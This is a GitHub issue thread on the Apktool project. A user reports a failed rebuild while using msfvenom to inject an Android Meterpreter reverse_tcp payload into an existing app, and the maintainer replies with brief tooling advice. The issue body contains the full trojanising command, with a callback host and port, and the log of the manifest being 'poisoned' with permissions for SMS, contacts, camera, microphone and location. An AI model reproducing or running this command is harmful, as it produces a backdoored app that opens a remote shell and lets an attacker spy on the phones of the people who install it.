### ISSUE TITLE
Stuck in apktool rebuilding apk

### ISSUE THREAD

**Issue by rudraacng** [iBotPeaches/Apktool#2698]
msfvenom -x ak.apk -p android/meterpreter/reverse_tcp LHOST=192.168.43.151 LPORT=4444 -o akyu.apk                     
Using APK template: aku.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package ooo.teachthetechno.akuguru.rqylp
[*] Loading /tmp/d20211122-2236-fw7hkb/original/smali/androidx/multidex/MultiDexApplication.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.CAMERA"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.READ_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.RECORD_AUDIO"/>
[*] Adding <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20211122-2236-fw7hkb/output.apk
[-] I: Using Apktool 2.4.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_assets folder into assets.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Building resources...
W: invalid resource directory name: /tmp/d20211122-2236-fw7hkb/original/res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_6912741450818173192.tmp, p, --forced-package-id, 127, --min-sdk-version, 19, --target-sdk-version, 30, --version-code, 18, --version-name, 2.9, --no-version-vectors, -F, /tmp/APKTOOL7420668200181078867.tmp, -e, /tmp/APKTOOL6389394797690019993.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20211122-2236-fw7hkb/original/res, -M, /tmp/d20211122-2236-fw7hkb/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool

**Comment by iBotPeaches** [comment]
You'll want to use aapt2 here.

From this crash line, I know that to be true.

```
 W: invalid resource directory name: /tmp/d20211122-2236-fw7hkb/original/res navigation
```
 
Also the version you have is out of date.
